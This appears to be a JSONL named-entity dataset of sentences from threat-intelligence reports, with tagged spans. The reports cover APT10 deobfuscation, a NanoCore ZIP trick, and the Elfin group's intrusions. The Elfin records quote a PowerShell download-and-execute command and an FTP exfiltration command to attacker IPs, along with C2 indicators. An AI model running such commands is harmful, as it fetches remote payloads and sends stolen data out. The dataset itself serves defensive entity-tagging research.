{"text": "(", "spans": {}, "info": {"id": "aptner_train_000457", "source": "aptner_train"}}
{"text": "“ HexRaysDeob ”", "spans": {"System: HexRaysDeob": [[2, 13]]}, "info": {"id": "aptner_train_000458", "source": "aptner_train"}}
{"text": ",", "spans": {}, "info": {"id": "aptner_train_000459", "source": "aptner_train"}}
{"text": "0xdead )", "spans": {}, "info": {"id": "aptner_train_000460", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000461", "source": "aptner_train"}}
{"text": "The command will instruct the code to execute only opaque predicates deobfuscation in the current selected function .", "spans": {}, "info": {"id": "aptner_train_000462", "source": "aptner_train"}}
{"text": "This allows an analyst to quickly check if there are any lost blocks by control flow unflattening .", "spans": {}, "info": {"id": "aptner_train_000463", "source": "aptner_train"}}
{"text": "After the check ,", "spans": {}, "info": {"id": "aptner_train_000464", "source": "aptner_train"}}
{"text": "the original result can be restored by using the following command :", "spans": {}, "info": {"id": "aptner_train_000465", "source": "aptner_train"}}
{"text": "idc.load_and_run_plugin", "spans": {}, "info": {"id": "aptner_train_000466", "source": "aptner_train"}}
{"text": "(", "spans": {}, "info": {"id": "aptner_train_000467", "source": "aptner_train"}}
{"text": "“ HexRaysDeob ”", "spans": {"System: HexRaysDeob": [[2, 13]]}, "info": {"id": "aptner_train_000468", "source": "aptner_train"}}
{"text": ",", "spans": {}, "info": {"id": "aptner_train_000469", "source": "aptner_train"}}
{"text": "0xf001 )", "spans": {}, "info": {"id": "aptner_train_000470", "source": "aptner_train"}}
{"text": ".", "spans": {}, "info": {"id": "aptner_train_000471", "source": "aptner_train"}}
{"text": "The compiler-level obfuscations like opaque predicates and control flow flattening are started to be observed in the wild by analyst and researchers .", "spans": {}, "info": {"id": "aptner_train_000472", "source": "aptner_train"}}
{"text": "Currently malware with the obfuscations is limited ,", "spans": {}, "info": {"id": "aptner_train_000473", "source": "aptner_train"}}
{"text": "however TAU expects not only APT10 but also other threat actors will start to use them .", "spans": {"Organization: TAU": [[8, 11]], "Organization: APT10": [[29, 34]]}, "info": {"id": "aptner_train_000474", "source": "aptner_train"}}
{"text": "Unfortunately ,", "spans": {}, "info": {"id": "aptner_train_000475", "source": "aptner_train"}}
{"text": "in order to break the techniques we have to understand both of the obfuscation mechanisms and disassembler tool internals before we can automate the process .", "spans": {}, "info": {"id": "aptner_train_000476", "source": "aptner_train"}}
{"text": "TAU modified the original HexRaysDeob to make it work for APT10 ANEL obfuscations .", "spans": {"Organization: TAU": [[0, 3]], "System: HexRaysDeob": [[26, 37]], "Organization: APT10": [[58, 63]], "Malware: ANEL": [[64, 68]]}, "info": {"id": "aptner_train_000477", "source": "aptner_train"}}
{"text": "The modified code is available publically here .", "spans": {}, "info": {"id": "aptner_train_000478", "source": "aptner_train"}}
{"text": "The summary of the modifications is :", "spans": {}, "info": {"id": "aptner_train_000479", "source": "aptner_train"}}
{"text": "New patterns and data-flow tracking for opaque predicates .", "spans": {}, "info": {"id": "aptner_train_000480", "source": "aptner_train"}}
{"text": "Analysis in multiple maturity levels ,", "spans": {}, "info": {"id": "aptner_train_000481", "source": "aptner_train"}}
{"text": "considering multiple control flow dispatchers and various jump cases for control flow flattening .", "spans": {}, "info": {"id": "aptner_train_000482", "source": "aptner_train"}}
{"text": "The tool can work for almost all obfuscated functions in the tested sample .", "spans": {}, "info": {"id": "aptner_train_000483", "source": "aptner_train"}}
{"text": "This implementation will deobfuscate approximately 89% of encountered functions .", "spans": {}, "info": {"id": "aptner_train_000484", "source": "aptner_train"}}
{"text": "This provides researchers and analyst broad tool to attack this type of obfuscation ,", "spans": {}, "info": {"id": "aptner_train_000485", "source": "aptner_train"}}
{"text": "and if it adopted in other families .", "spans": {}, "info": {"id": "aptner_train_000486", "source": "aptner_train"}}
{"text": "In should be noted that the tool may not work for the updated versions of ANEL if they are compiled with different options of the obfuscating compiler .", "spans": {"Organization: ANEL": [[74, 78]]}, "info": {"id": "aptner_train_000487", "source": "aptner_train"}}
{"text": "Testing in multiple versions is important ,", "spans": {}, "info": {"id": "aptner_train_000488", "source": "aptner_train"}}
{"text": "so TAU is looking for newer versions ANEL samples .", "spans": {"Organization: TAU": [[3, 6]], "Organization: ANEL": [[37, 41]]}, "info": {"id": "aptner_train_000489", "source": "aptner_train"}}
{"text": "Please reach out to our unit if you have relevant samples or need assistance in deobfuscating the codes .", "spans": {}, "info": {"id": "aptner_train_000490", "source": "aptner_train"}}
{"text": "Double Loaded Zip File Delivers Nanocore Most malware sent via emails is packaged in archives such as ZIP, RAR, and 7z (7-Zip ) .", "spans": {"System: emails": [[63, 69]]}, "info": {"id": "aptner_train_000491", "source": "aptner_train"}}
{"text": "Occasionally, we encounter some clever and creative ways these malicious archives are crafted .", "spans": {}, "info": {"id": "aptner_train_000492", "source": "aptner_train"}}
{"text": "Here we will examine an example of an oddly formatted ZIP archive hiding the NanoCore malware .", "spans": {"Malware: NanoCore": [[77, 85]]}, "info": {"id": "aptner_train_000493", "source": "aptner_train"}}
{"text": "We spotted a courier themed spam campaign on our Secure Email Gateway (SEG ) cloud recently .", "spans": {"System: Secure Email Gateway": [[49, 69]], "System: (SEG": [[70, 74]]}, "info": {"id": "aptner_train_000494", "source": "aptner_train"}}
{"text": "The message claimed to be from an Export Operation Specialist of USCO Logistics and that it was sent as per their customer request .", "spans": {"Organization: USCO Logistics": [[65, 79]]}, "info": {"id": "aptner_train_000495", "source": "aptner_train"}}
{"text": "Aside from this, there were several other suspicious items we noted: Headers mismatched: The Reply-To and From email address were different .", "spans": {"System: email": [[111, 116]]}, "info": {"id": "aptner_train_000496", "source": "aptner_train"}}
{"text": "Furthermore, the email address used in Reply-To is from a free email client Gmail .", "spans": {"System: email": [[17, 22], [63, 68]]}, "info": {"id": "aptner_train_000497", "source": "aptner_train"}}
{"text": "Suspicious message body: The attachment was mentioned in the message body twice, making sure to direct the reader’s attention towards the attachment .", "spans": {}, "info": {"id": "aptner_train_000498", "source": "aptner_train"}}
{"text": "Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf.zip ends with pdf.zip .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[51, 85]], "Indicator: pdf.zip": [[96, 103]]}, "info": {"id": "aptner_train_000499", "source": "aptner_train"}}
{"text": "That usually means that the name of the file inside the archive ends with 2 known file extensions “pdf.<extension>” (archiving tools usually defaults the <extension> to the archive’s format e.g. zip ) .", "spans": {}, "info": {"id": "aptner_train_000500", "source": "aptner_train"}}
{"text": "The attachment SHIPPING_MX00034900_PL_INV_pdf.zip makes this message stand out .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[15, 49]]}, "info": {"id": "aptner_train_000501", "source": "aptner_train"}}
{"text": "The ZIP file had a file size significantly greater than that of its uncompressed content .", "spans": {}, "info": {"id": "aptner_train_000502", "source": "aptner_train"}}
{"text": "Typically, the size of the ZIP file should be less than the uncompressed content or, in some cases, ZIP files will grow larger than the original files by a reasonable number of bytes .", "spans": {}, "info": {"id": "aptner_train_000503", "source": "aptner_train"}}
{"text": "ZIP archives are supposed to have one “End of Central Directory” (EOCD) signifying the end of the archive .", "spans": {}, "info": {"id": "aptner_train_000504", "source": "aptner_train"}}
{"text": "Looking deeper into the structure of SHIPPING_MX00034900_PL_INV_pdf.zip , the attachment has two EOCDs .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[37, 71]]}, "info": {"id": "aptner_train_000505", "source": "aptner_train"}}
{"text": "After the first EOCD comes some extra data – another ZIP file structure .", "spans": {}, "info": {"id": "aptner_train_000506", "source": "aptner_train"}}
{"text": "It turns out that the first ZIP structure is for the image file order.jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf.exe .", "spans": {"Indicator: order.jpg": [[64, 73]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[121, 155]]}, "info": {"id": "aptner_train_000507", "source": "aptner_train"}}
{"text": "Both are compressed when archived, and both indicate that they are the only file in their ZIP structures as indicated in their local file headers and EOCDs respectively .", "spans": {}, "info": {"id": "aptner_train_000508", "source": "aptner_train"}}
{"text": "The image file “order.jpg” contained in the first ZIP structure is actually a non-malicious PNG formatted image file .", "spans": {}, "info": {"id": "aptner_train_000509", "source": "aptner_train"}}
{"text": "This serves as a decoy, an attempt to hide the content of the other ZIP structure .", "spans": {}, "info": {"id": "aptner_train_000510", "source": "aptner_train"}}
{"text": "The image file has been correctly identified by SEG as a PNG when its file extension is .jpg denoting a JPEG formatted image .", "spans": {"Indicator: .jpg": [[88, 92]]}, "info": {"id": "aptner_train_000511", "source": "aptner_train"}}
{"text": "The second ZIP structure contains SHIPPING_MX00034900_PL_INV_pdf.exe , which is a NanoCore RAT .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[34, 68]], "Malware: NanoCore": [[82, 90]]}, "info": {"id": "aptner_train_000512", "source": "aptner_train"}}
{"text": "This remote access Trojan has the capability that allows an attacker to completely take control of the compromised machine .", "spans": {"Malware: Trojan": [[19, 25]]}, "info": {"id": "aptner_train_000513", "source": "aptner_train"}}
{"text": "It connects to its command and control server at 194.5.98.85 on port 11903 .", "spans": {"Indicator: 194.5.98.85": [[49, 60]]}, "info": {"id": "aptner_train_000514", "source": "aptner_train"}}
{"text": "This NanoCore RAT is version 1.2.2.0 which has been found to be offered for free on the Dark Web just a few months ago .", "spans": {"Malware: NanoCore": [[5, 13]], "Organization: Dark Web": [[88, 96]]}, "info": {"id": "aptner_train_000515", "source": "aptner_train"}}
{"text": "We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf.zip .", "spans": {"System: PowerArchiver 2019": [[42, 60]], "System: WinZip": [[63, 69]], "System: WinRar": [[72, 78]], "System: 7Zip": [[81, 85]], "System: unzIP": [[92, 97]], "System: Windows": [[121, 128]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[187, 221]]}, "info": {"id": "aptner_train_000516", "source": "aptner_train"}}
{"text": "Among these 5 tools, only WinZip and Windows’ unzIP were not able to extract anything from the ZIP file as they encountered an error at the start of the extraction process .", "spans": {"System: WinZip": [[26, 32]], "System: unzIP": [[46, 51]]}, "info": {"id": "aptner_train_000517", "source": "aptner_train"}}
{"text": "The other archiving tools were able to extract one file from the ZIP attachment – either order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe .", "spans": {"Indicator: order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe": [[89, 136]]}, "info": {"id": "aptner_train_000518", "source": "aptner_train"}}
{"text": "WinZip version 11.2 and 24.0, and the built-in unzIP tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf.zip is an invalid archive .", "spans": {"System: WinZip": [[0, 6]], "System: unzIP": [[47, 52]], "System: Windows": [[61, 68]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[102, 136]]}, "info": {"id": "aptner_train_000519", "source": "aptner_train"}}
{"text": "Only WinZip gave an explicit reason – the start of central directory of the ZIP was not found .", "spans": {"System: WinZip": [[5, 11]]}, "info": {"id": "aptner_train_000520", "source": "aptner_train"}}
{"text": "The central directory it pertained to is the one in the second ZIP structure .", "spans": {}, "info": {"id": "aptner_train_000521", "source": "aptner_train"}}
{"text": "At figure 2, the second EOCD indicates that its only central directory is located at file offset 0xd148f whereas it is at 0xd40d41. (The size of the first", "spans": {}, "info": {"id": "aptner_train_000522", "source": "aptner_train"}}
{"text": "ZIP structure was not considered.) Meanwhile, the archiving tools PowerArchiver 2019 , WinRar , and 7Zip were able to extract a file from the attachment SHIPPING_MX00034900_PL_INV_pdf.zip .", "spans": {"System: PowerArchiver 2019": [[66, 84]], "System: WinRar": [[87, 93]], "System: 7Zip": [[100, 104]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[153, 187]]}, "info": {"id": "aptner_train_000523", "source": "aptner_train"}}
{"text": "The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf.exe as the only content of the ZIP attachment .", "spans": {"System: PowerArchiver 2019": [[23, 41]], "System: WinRar": [[46, 52]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[101, 135]]}, "info": {"id": "aptner_train_000524", "source": "aptner_train"}}
{"text": "No error or warning was prompted during the extraction .", "spans": {}, "info": {"id": "aptner_train_000525", "source": "aptner_train"}}
{"text": "Older versions of 7Zip also behave like PowerArchiver and WinRAR . 7Zip version 9.22 and older saw the executable as well .", "spans": {"System: 7Zip": [[18, 22], [67, 71]], "System: PowerArchiver": [[40, 53]], "System: WinRAR": [[58, 64]]}, "info": {"id": "aptner_train_000526", "source": "aptner_train"}}
{"text": "However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order.jpg instead .", "spans": {"System: 7Zip": [[23, 27]], "System: 7zip": [[118, 122]], "Indicator: order.jpg": [[166, 175]]}, "info": {"id": "aptner_train_000527", "source": "aptner_train"}}
{"text": "The second ZIP structure was treated as extra data; hence, a warning was added to the extracted image file’s properties .", "spans": {}, "info": {"id": "aptner_train_000528", "source": "aptner_train"}}
{"text": "Among the archiving tools we tried, WinRar 3.30 behaved differently and unexpectedly .", "spans": {"System: WinRar": [[36, 42]]}, "info": {"id": "aptner_train_000529", "source": "aptner_train"}}
{"text": "The content of the ZIP attachment it displayed in its UI was not the one it extracted! This sample challenges gateways scanners .", "spans": {}, "info": {"id": "aptner_train_000530", "source": "aptner_train"}}
{"text": "Depending on the type of decompression engine used, there is a good probability that only the decoy file may be scrutinized and vetted, and the malicious content unnoticed – just like how some of the most popular archiving tools failed to notice the second ZIP structure .", "spans": {}, "info": {"id": "aptner_train_000531", "source": "aptner_train"}}
{"text": "Despite what the gateway does, this attack would only succeed if the message got through the gateway and a particular archive utility is used by the end-user, such as certain versions of PowerArchiver , WinRar , and older 7Zip as described above .", "spans": {"System: PowerArchiver": [[187, 200]], "System: WinRar": [[203, 209]], "System: 7Zip": [[222, 226]]}, "info": {"id": "aptner_train_000532", "source": "aptner_train"}}
{"text": "In this case, the Trustwave Secure email Gateway flagged the message as suspicious and it did not get through .", "spans": {"System: email": [[35, 40]]}, "info": {"id": "aptner_train_000533", "source": "aptner_train"}}
{"text": "Nevertheless, this case does highlight the types of tricks the bad guys are using in an attempt to deliver malware through email .", "spans": {}, "info": {"id": "aptner_train_000534", "source": "aptner_train"}}
{"text": "SHIPPING_MX00034900_PL_INV_pdf.zip : 9474e1517c98d4165300a49612888d16643efbf6 .", "spans": {"Indicator: SHIPPING_MX00034900_PL_INV_pdf.zip": [[0, 34]], "Indicator: 9474e1517c98d4165300a49612888d16643efbf6": [[37, 77]]}, "info": {"id": "aptner_train_000535", "source": "aptner_train"}}
{"text": "Elfin : Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000536", "source": "aptner_train"}}
{"text": "The group , which first became active in late 2015 or early 2016 , specializes in scanning for vulnerable websites and using this to identify potential targets , either for attacks or creation of command and control ( C&C ) infrastructure .", "spans": {}, "info": {"id": "aptner_train_000538", "source": "aptner_train"}}
{"text": "It has compromised a wide range of targets , including governments along with organizations in the research , chemical , engineering , manufacturing , consulting , finance , telecoms , and several other sectors .", "spans": {"Organization: governments": [[55, 66]]}, "info": {"id": "aptner_train_000539", "source": "aptner_train"}}
{"text": "Elfin continues to be focused heavily on Saudi Arabia , which accounted for 42 percent of attacks observed by Symantec since the beginning of 2016 .", "spans": {"Organization: Elfin": [[0, 5]], "Organization: Symantec": [[110, 118]]}, "info": {"id": "aptner_train_000540", "source": "aptner_train"}}
{"text": "However , the U.S. has also been a country of significant interest to the group , with 18 organizations attacked over the past three years , including a number of Fortune 500 companies .", "spans": {}, "info": {"id": "aptner_train_000541", "source": "aptner_train"}}
{"text": "Elfin targets in the U.S. have included organizations in the engineering , chemical , research , energy consultancy , finance , IT , and healthcare sectors .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000542", "source": "aptner_train"}}
{"text": "Some of these U.S. organizations may have been targeted by Elfin for the purpose of mounting supply chain attacks .", "spans": {"Organization: Elfin": [[59, 64]]}, "info": {"id": "aptner_train_000543", "source": "aptner_train"}}
{"text": "In one instance , a large U.S. company was attacked in the same month a Middle Eastern company it co-owns was also compromised .", "spans": {}, "info": {"id": "aptner_train_000544", "source": "aptner_train"}}
{"text": "In a recent wave of attacks during February 2019 , Elfin attempted to exploit a known vulnerability ( CVE-2018-20250 ) in WinRAR , the widely used file archiving and compression utility capable of creating self-extracting archive files .", "spans": {"Organization: Elfin": [[51, 56]], "Vulnerability: CVE-2018-20250": [[102, 116]], "System: WinRAR": [[122, 128]]}, "info": {"id": "aptner_train_000545", "source": "aptner_train"}}
{"text": "The exploit was used against one target in the chemical sector in Saudi Arabia .", "spans": {}, "info": {"id": "aptner_train_000546", "source": "aptner_train"}}
{"text": "If successfully exploited on an unpatched computer , the vulnerability could permit an attacker to install any file on the computer , which effectively permits code execution on the targeted computer .", "spans": {}, "info": {"id": "aptner_train_000547", "source": "aptner_train"}}
{"text": "Two users in the targeted organization received a file called \" JobDetails.rar \" , which attempted to exploit the WinRAR vulnerability .", "spans": {"Indicator: JobDetails.rar": [[64, 78]], "System: WinRAR": [[114, 120]]}, "info": {"id": "aptner_train_000548", "source": "aptner_train"}}
{"text": "This file was likely delivered via a spear-phishing email .", "spans": {}, "info": {"id": "aptner_train_000549", "source": "aptner_train"}}
{"text": "However , prior to this attempted attack , Symantec had rolled out proactive protection against any attempt to exploit this vulnerability ( Exp.CVE-2018-20250 ) .", "spans": {"Organization: Symantec": [[43, 51]], "Vulnerability: Exp.CVE-2018-20250": [[140, 158]]}, "info": {"id": "aptner_train_000550", "source": "aptner_train"}}
{"text": "This protection successfully protected the targeted organization from being compromised .", "spans": {}, "info": {"id": "aptner_train_000551", "source": "aptner_train"}}
{"text": "Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks .", "spans": {"Organization: Elfin": [[0, 5]], "Organization: Shamoon": [[86, 93]]}, "info": {"id": "aptner_train_000552", "source": "aptner_train"}}
{"text": "One Shamoon victim in Saudi Arabia had recently also been attacked by Elfin and had been infected with the Stonedrill malware ( Trojan.Stonedrill ) used by Elfin .", "spans": {"Organization: Shamoon": [[4, 11]], "Organization: Elfin": [[70, 75], [156, 161]], "Malware: Stonedrill": [[107, 117]], "Malware: Trojan.Stonedrill": [[128, 145]]}, "info": {"id": "aptner_train_000553", "source": "aptner_train"}}
{"text": "Because the Elfin and the Shamoon attacks against this organization occurred so close together , there has been speculation that the two groups may be linked .", "spans": {"Organization: Elfin": [[12, 17]], "Organization: Shamoon": [[26, 33]]}, "info": {"id": "aptner_train_000554", "source": "aptner_train"}}
{"text": "However , Symantec has found no further evidence to suggest Elfin was responsible for these Shamoon attacks to date .", "spans": {"Organization: Symantec": [[10, 18]], "Organization: Elfin": [[60, 65]], "Organization: Shamoon": [[92, 99]]}, "info": {"id": "aptner_train_000555", "source": "aptner_train"}}
{"text": "We continue to monitor the activities of both groups closely .", "spans": {}, "info": {"id": "aptner_train_000556", "source": "aptner_train"}}
{"text": "Elfin has deployed a wide range of tools in its attacks including custom malware , commodity malware , and open-source hacking tools .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000557", "source": "aptner_train"}}
{"text": "Custom malware used by the group include :", "spans": {}, "info": {"id": "aptner_train_000558", "source": "aptner_train"}}
{"text": "Notestuk ( Backdoor.Notestuk ) ( aka TURNEDUP ) : Malware that can be used to open a backdoor and gather information from a compromised computer .", "spans": {"Malware: Notestuk": [[0, 8]], "Malware: Backdoor.Notestuk": [[11, 28]], "Malware: TURNEDUP": [[37, 45]]}, "info": {"id": "aptner_train_000559", "source": "aptner_train"}}
{"text": "Stonedrill ( Trojan.Stonedrill ) : Custom malware capable of opening a backdoor on an infected computer and downloading additional files .", "spans": {"Malware: Stonedrill": [[0, 10]], "Malware: Trojan.Stonedrill": [[13, 30]]}, "info": {"id": "aptner_train_000560", "source": "aptner_train"}}
{"text": "The malware also features a destructive component , which can wipe the master boot record of an infected computer .", "spans": {}, "info": {"id": "aptner_train_000561", "source": "aptner_train"}}
{"text": "AutoIt backdoor : A custom built backdoor written in the AutoIt scripting language .", "spans": {"Malware: AutoIt backdoor": [[0, 15]]}, "info": {"id": "aptner_train_000562", "source": "aptner_train"}}
{"text": "In addition to its custom malware , Elfin has also used a number of commodity malware tools , available for purchase on the cyber underground .", "spans": {"Organization: Elfin": [[36, 41]]}, "info": {"id": "aptner_train_000563", "source": "aptner_train"}}
{"text": "These include :", "spans": {}, "info": {"id": "aptner_train_000564", "source": "aptner_train"}}
{"text": "Remcos ( Backdoor.Remvio ) : A commodity remote administration tool ( RAT ) that can be used to steal information from an infected computer .", "spans": {"Malware: Remcos": [[0, 6]], "Malware: Backdoor.Remvio": [[9, 24]]}, "info": {"id": "aptner_train_000565", "source": "aptner_train"}}
{"text": "DarkComet ( Backdoor.Breut ) : Another commodity RAT used to open a backdoor on an infected computer and steal information .", "spans": {"Malware: DarkComet": [[0, 9]], "Malware: Backdoor.Breut": [[12, 26]]}, "info": {"id": "aptner_train_000566", "source": "aptner_train"}}
{"text": "Quasar RAT ( Trojan.Quasar ) : Commodity RAT that can be used to steal passwords and execute commands on an infected computer .", "spans": {"Malware: Quasar RAT": [[0, 10]], "Malware: Trojan.Quasar": [[13, 26]]}, "info": {"id": "aptner_train_000567", "source": "aptner_train"}}
{"text": "Pupy RAT ( Backdoor.Patpoopy ) : Commodity RAT that can open a backdoor on an infected computer .", "spans": {"Malware: Pupy RAT": [[0, 8]], "Malware: Backdoor.Patpoopy": [[11, 28]]}, "info": {"id": "aptner_train_000568", "source": "aptner_train"}}
{"text": "NanoCore ( Trojan.Nancrat ) : Commodity RAT used to open a backdoor on an infected computer and steal information .", "spans": {"Malware: NanoCore": [[0, 8]], "Malware: Trojan.Nancrat": [[11, 25]]}, "info": {"id": "aptner_train_000569", "source": "aptner_train"}}
{"text": "NetWeird ( Trojan.Netweird.B ) : A commodity Trojan which can open a backdoor and steal information from the compromised computer .", "spans": {"Malware: NetWeird": [[0, 8]], "Malware: Trojan.Netweird.B": [[11, 28]], "Malware: Trojan": [[45, 51]]}, "info": {"id": "aptner_train_000570", "source": "aptner_train"}}
{"text": "It may also download additional potentially malicious files .", "spans": {}, "info": {"id": "aptner_train_000571", "source": "aptner_train"}}
{"text": "Elfin also makes frequent use of a number of publicly available hacking tools , including :", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000572", "source": "aptner_train"}}
{"text": "LaZagne ( SecurityRisk.LaZagne ) : A login/password retrieval tool .", "spans": {"Malware: LaZagne": [[0, 7]], "Malware: SecurityRisk.LaZagne": [[10, 30]]}, "info": {"id": "aptner_train_000573", "source": "aptner_train"}}
{"text": "Mimikatz ( Hacktool.Mimikatz ) : Tool designed to steal credentials .", "spans": {"Malware: Mimikatz": [[0, 8]], "Malware: Hacktool.Mimikatz": [[11, 28]]}, "info": {"id": "aptner_train_000574", "source": "aptner_train"}}
{"text": "Gpppassword : Tool used to obtain and decrypt Group Policy Preferences ( GPP ) passwords .", "spans": {"Malware: Gpppassword": [[0, 11]]}, "info": {"id": "aptner_train_000575", "source": "aptner_train"}}
{"text": "SniffPass ( SniffPass ) : Tool designed to steal passwords by sniffing network traffic .", "spans": {"Malware: SniffPass": [[0, 9], [12, 21]]}, "info": {"id": "aptner_train_000576", "source": "aptner_train"}}
{"text": "In this section , we describe in detail an Elfin attack on a U.S. organization .", "spans": {"Organization: Elfin": [[43, 48]]}, "info": {"id": "aptner_train_000577", "source": "aptner_train"}}
{"text": "On February 12 , 2018 at 16:45 ( all times are in the organization’s local time ) , an email was sent to the organization advertising a job vacancy at an American global service provider .", "spans": {"System: email": [[87, 92]]}, "info": {"id": "aptner_train_000578", "source": "aptner_train"}}
{"text": "The email contained a malicious link to http://mynetwork.ddns.net:880 .", "spans": {"System: email": [[4, 9]], "Indicator: http://mynetwork.ddns.net:880": [[40, 69]]}, "info": {"id": "aptner_train_000579", "source": "aptner_train"}}
{"text": "The recipient clicked the link and proceeded to download and open a malicious HTML executable file , which in turn loaded content from a C&C server via an embedded iframe .", "spans": {}, "info": {"id": "aptner_train_000580", "source": "aptner_train"}}
{"text": "At the same time , code embedded within this file also executed a powershell command to download and execute a copy of chfeeds.vbe from the C&C server . [System.Net.ServicePointManager] : :S erverCertificateValidationCallback={$true};IEX (New-Object Net.WebClient ) .DownloadString ( ' https://217.147.168.46:8088/index.jpg ' ) .", "spans": {"System: powershell": [[66, 76]], "Indicator: chfeeds.vbe": [[119, 130]], "System: C&C server": [[140, 150]], "Indicator: https://217.147.168.46:8088/index.jpg": [[286, 323]]}, "info": {"id": "aptner_train_000581", "source": "aptner_train"}}
{"text": "A second JavaScript command was also executed , which created a scheduled task to execute chfeeds.vbe multiple times a day .", "spans": {"Indicator: chfeeds.vbe": [[90, 101]]}, "info": {"id": "aptner_train_000582", "source": "aptner_train"}}
{"text": "The chfeeds.vbe file acts as a downloader and was used to download a second powershell script ( registry.ps1 ) .", "spans": {"Indicator: chfeeds.vbe": [[4, 15]], "System: powershell": [[76, 86]], "Indicator: registry.ps1": [[96, 108]]}, "info": {"id": "aptner_train_000583", "source": "aptner_train"}}
{"text": "This script in turn downloaded and executed a PowerShell backdoor known as POSHC2 , a proxy-aware C&C framework , from the C&C server ( https:// host-manager.hopto.org ) .", "spans": {"Malware: PowerShell backdoor": [[46, 65]], "Malware: POSHC2": [[75, 81]], "System: proxy-aware C&C framework": [[86, 111]], "Indicator: https:// host-manager.hopto.org": [[136, 167]]}, "info": {"id": "aptner_train_000584", "source": "aptner_train"}}
{"text": "Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89.34.237.118 808 http://89.34.237.118:808/Rar32.exe .", "spans": {"System: WinRAR": [[117, 123]], "Indicator: 89.34.237.118 808": [[126, 143]], "Indicator: http://89.34.237.118:808/Rar32.exe": [[144, 178]]}, "info": {"id": "aptner_train_000585", "source": "aptner_train"}}
{"text": "At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192.119.15.35 880 http://mynetwork.ddns.net:880/st-36-p4578.ps1 .", "spans": {"Malware: POSHC2": [[78, 84]], "Indicator: 192.119.15.35 880": [[94, 111]], "Indicator: http://mynetwork.ddns.net:880/st-36-p4578.ps1": [[112, 157]]}, "info": {"id": "aptner_train_000586", "source": "aptner_train"}}
{"text": "This tool was downloaded several times between 23:29 on February 12 and 07:47 on February 13 .", "spans": {}, "info": {"id": "aptner_train_000587", "source": "aptner_train"}}
{"text": "Two days later , on February 14 at 15:12 , the attackers returned and installed Quasar RAT onto the infected computer that communicated with a C&C server ( 217.147.168.123 ) .", "spans": {"Malware: Quasar RAT": [[80, 90]], "Indicator: 217.147.168.123": [[156, 171]]}, "info": {"id": "aptner_train_000588", "source": "aptner_train"}}
{"text": "Quasar RAT was installed to CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe .", "spans": {"Malware: Quasar RAT": [[0, 10]], "Indicator: CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe": [[28, 83]]}, "info": {"id": "aptner_train_000589", "source": "aptner_train"}}
{"text": "At this point , the attackers ceased activity while maintaining access to the network until February 21 .", "spans": {}, "info": {"id": "aptner_train_000590", "source": "aptner_train"}}
{"text": "At 06:38 , the attackers were observed downloading a custom .NET FTP tool to the infected computer . 192.119.15.36 880 http://192.119.15.36:880/ftp.exe .", "spans": {"Malware: .NET FTP": [[60, 68]], "Indicator: 192.119.15.36 880": [[101, 118]], "Indicator: http://192.119.15.36:880/ftp.exe": [[119, 151]]}, "info": {"id": "aptner_train_000591", "source": "aptner_train"}}
{"text": "Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf.exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89.34.237.118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] .", "spans": {"System: FTP": [[58, 61]], "Indicator: JsuObf.exe": [[85, 95]]}, "info": {"id": "aptner_train_000592", "source": "aptner_train"}}
{"text": "Activity ceased until the attackers returned on March 5 and were observed using Quasar RAT to download a second custom AutoIt FTP Exfiltration tool known as FastUploader from http://192.119.15.36:880/ftp.exe .", "spans": {"Malware: Quasar RAT": [[80, 90]], "Malware: AutoIt FTP": [[119, 129]], "Malware: FastUploader": [[157, 169]], "Indicator: http://192.119.15.36:880/ftp.exe": [[175, 207]]}, "info": {"id": "aptner_train_000593", "source": "aptner_train"}}
{"text": "This tool was then installed to csidl_profile\\appdata\\roaming\\adobe\\ftp.exe .", "spans": {"Indicator: csidl_profile\\appdata\\roaming\\adobe\\ftp.exe": [[32, 75]]}, "info": {"id": "aptner_train_000594", "source": "aptner_train"}}
{"text": "FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients .", "spans": {"Malware: FastUploader": [[0, 12]], "System: FTP": [[25, 28], [96, 99]]}, "info": {"id": "aptner_train_000595", "source": "aptner_train"}}
